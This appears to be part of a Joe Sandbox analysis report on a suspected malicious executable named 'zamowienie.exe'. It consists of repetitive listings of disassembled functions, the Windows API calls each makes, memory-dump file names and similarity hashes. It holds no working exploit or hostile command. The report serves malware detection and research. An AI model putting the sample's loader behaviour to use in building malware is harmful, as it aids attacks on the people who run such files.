                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: 6a1283def284ae2da235a8de8de440d50ddb230b130f4cbec3169f4b243e88d9
                                                                                                                                              • Instruction ID: eb4af4dd0c534903fe99289be2cea4467e3b295a60047e55610cfbb868e6ccdb
                                                                                                                                              • Opcode Fuzzy Hash: 6a1283def284ae2da235a8de8de440d50ddb230b130f4cbec3169f4b243e88d9
                                                                                                                                              • Instruction Fuzzy Hash: 70F0BD71D10209EBDF01DFA4D5497DFBBF4AF04315F10817AD451B6280D7B982598FA9
                                                                                                                                              Function 00401EEA Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                              • Opcode ID: 48ee10a0f6d495821d6d0eaf072cde0f0566fd2bad53c27f28243038c5da5e20
                                                                                                                                              • Instruction ID: 9c481bcdf8b2feaaba5878e910a608199c1a4b3810ffe6955d5d808e0a2afacb
                                                                                                                                              • Opcode Fuzzy Hash: 48ee10a0f6d495821d6d0eaf072cde0f0566fd2bad53c27f28243038c5da5e20
                                                                                                                                              • Instruction Fuzzy Hash: EDE0D832A082049FEF64EBA4FE8556F77B0EB90325B20443FE001F10C2CA7849428A5D
                                                                                                                                              Function 00405A57 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422158,00426800,00426800,00426800,?,948,00000000), ref: 00405A80
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A8D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3712363035-0
                                                                                                                                              • Opcode ID: ab581ddd3fda7b37a8f125a330bfa88cdadf53e3127e255e3fee9c89dfd7c3ea
                                                                                                                                              • Instruction ID: c84a9a15433e64c4cbb2df3d230690adcd9c92945636d4ae6b18afee34dce5d0
                                                                                                                                              • Opcode Fuzzy Hash: ab581ddd3fda7b37a8f125a330bfa88cdadf53e3127e255e3fee9c89dfd7c3ea
                                                                                                                                              • Instruction Fuzzy Hash: 4FE04FB060020ABFEB109F60ED09F7B776CEB00244F418421BE10F2250D67498658A78
                                                                                                                                              Function 004067E6 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000000,?,00403633,?), ref: 004067F8
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406813
                                                                                                                                                • Part of subcall function 00406778: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040678F
                                                                                                                                                • Part of subcall function 00406778: wsprintfA.USER32 ref: 004067C8
                                                                                                                                                • Part of subcall function 00406778: LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 004067DC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                              • Opcode ID: d21155a8e253951b1807020726629df3aa91f7e4109fffff5a8a71fd9d99dec7
                                                                                                                                              • Instruction ID: 07d0a32b3898c4611f805b368682e561f72e8b78e430ac0a21bede51f330bf0f
                                                                                                                                              • Opcode Fuzzy Hash: d21155a8e253951b1807020726629df3aa91f7e4109fffff5a8a71fd9d99dec7
                                                                                                                                              • Instruction Fuzzy Hash: 56E086335042105AD6107A709E0893763ACAEC4710302883EF552F7140D7389C329B69
                                                                                                                                              Function 00405F51 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402FC4,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405F55
                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F77
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                              • Opcode ID: 4b81b148e8691c58bd2a360e443e4ee544bc9685a9596e96fbb344e13ad99358
                                                                                                                                              • Instruction ID: dec33779a3bbcace5fa9dc55a7fc16cefb125d2d487a635038e5798c5dd80b18
                                                                                                                                              • Opcode Fuzzy Hash: 4b81b148e8691c58bd2a360e443e4ee544bc9685a9596e96fbb344e13ad99358
                                                                                                                                              • Instruction Fuzzy Hash: 61D09E31254301AFEF099F20DE16F2E7BA2EB94B00F11953CB686940E0DA7158599B15
                                                                                                                                              Function 00405A22 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00405A28
                                                                                                                                              • GetLastError.KERNEL32(?,?,0000000A,?), ref: 00405A36
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: d9dda82da09fb7893b44e586d5b2745d7b8b94a6c082c699b781b15152cb1a79
                                                                                                                                              • Instruction ID: e36d23c5e1451d0700ba0f5c9af60a34e87de684c994d1d580a4c37f6ec1b7ff
                                                                                                                                              • Opcode Fuzzy Hash: d9dda82da09fb7893b44e586d5b2745d7b8b94a6c082c699b781b15152cb1a79
                                                                                                                                              • Instruction Fuzzy Hash: 75C04C30704501ABE7105B30AE48F1B7A60AB54745F158539B186F01E0DA748455DD2D
                                                                                                                                              Function 73402AC8 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnumWindows.USER32(00000000), ref: 73402B87
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1129996299-0
                                                                                                                                              • Opcode ID: 1a1e8d01b47033e789a7e21d74a253d53202ea07873d03fc97c0ea3fa71a6191
                                                                                                                                              • Instruction ID: 38ce24e11de78c602c9220d663ac7e055c8022b54e6060bc1fe463e795c35eeb
                                                                                                                                              • Opcode Fuzzy Hash: 1a1e8d01b47033e789a7e21d74a253d53202ea07873d03fc97c0ea3fa71a6191
                                                                                                                                              • Instruction Fuzzy Hash: 044197B2704208DFEB2DEF55DA8074D37B9EB44358F2048F9E509F62D0CA3598418F99
                                                                                                                                              Function 0040269A Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2111968516-0
                                                                                                                                              • Opcode ID: 0fe36527857f8881348b643065b2b246b8afa2cb0778b11d4d378b1206cbb6be
                                                                                                                                              • Instruction ID: d4f3a8d8f1a8d2f7e604c66df5b4d002099e4be4d78871a7fd53b370084e6dc9
                                                                                                                                              • Opcode Fuzzy Hash: 0fe36527857f8881348b643065b2b246b8afa2cb0778b11d4d378b1206cbb6be
                                                                                                                                              • Instruction Fuzzy Hash: 88219570D04299EADF318B6986596EEBBB09F01314F14407FE4D1B72D1C6BC8985CB69
                                                                                                                                              Function 0040168F Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileMove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3562171763-0
                                                                                                                                              • Opcode ID: 736259115f75f6b76578e1f504d17a9dde5746d7a41af1041caa35c432a10e3f
                                                                                                                                              • Instruction ID: 3eea2e80ce105ce43aa47b60fb3ffd9bf034f18d0ba033fe9074bc61ab9afadd
                                                                                                                                              • Opcode Fuzzy Hash: 736259115f75f6b76578e1f504d17a9dde5746d7a41af1041caa35c432a10e3f
                                                                                                                                              • Instruction Fuzzy Hash: 25F0B43160822597DF20B7B65F5DE5F52649F41338B20423BF512B21D1DAFDC643856E
                                                                                                                                              Function 00402758 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776
                                                                                                                                                • Part of subcall function 0040631C: wsprintfA.USER32 ref: 00406329
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointerwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 327478801-0
                                                                                                                                              • Opcode ID: 443154bf645b4e3229413af973f8e65a083d4b541d4c077c4952984b4b5e6138
                                                                                                                                              • Instruction ID: b311217b4e1e189b9dc5ac2a6169ac72d1bf2edb828c3e114634367c47785749
                                                                                                                                              • Opcode Fuzzy Hash: 443154bf645b4e3229413af973f8e65a083d4b541d4c077c4952984b4b5e6138
                                                                                                                                              • Instruction Fuzzy Hash: 79E09272B00104AFDF60EBA4AE49DAF7668EB40315B10043BF102F00C1CA7C09538A2D
                                                                                                                                              Function 004023C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                              • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                                                                                                                              • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                                                                                                                              • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                                                                                                                              • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                                                                                                                              Function 00401744 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401758
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PathSearch
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2203818243-0
                                                                                                                                              • Opcode ID: a57ab99e0bc005a3d1dada74b2d9eed85ce596f2812361e4de3a9a2952646b52
                                                                                                                                              • Instruction ID: 7afb7ab5f156d1e1887c416c3902ca815e055ed56aa31c56c45cb42f2e385555
                                                                                                                                              • Opcode Fuzzy Hash: a57ab99e0bc005a3d1dada74b2d9eed85ce596f2812361e4de3a9a2952646b52
                                                                                                                                              • Instruction Fuzzy Hash: C8E0D871304100EFEB50CB64DD48AAB3758DB10368B30453AE501A20C1D5B58A428728
                                                                                                                                              Function 00406272 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040629B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                              • Instruction ID: c099974d919f86b0450f3fc33f822e19e3e00ad1ef9ec63cbe29ee87193af974
                                                                                                                                              • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                              • Instruction Fuzzy Hash: 74E0ECB2120109BFEF096F90DD0ADBF3B1DEB08310F01492EF916E5091E6B6E930A674
                                                                                                                                              Function 00405FC9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,004138F8,0040B8F8,004034A6,0000000A,0000000A,004033AA,004138F8,00004000,?,00000000,00403254), ref: 00405FDD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
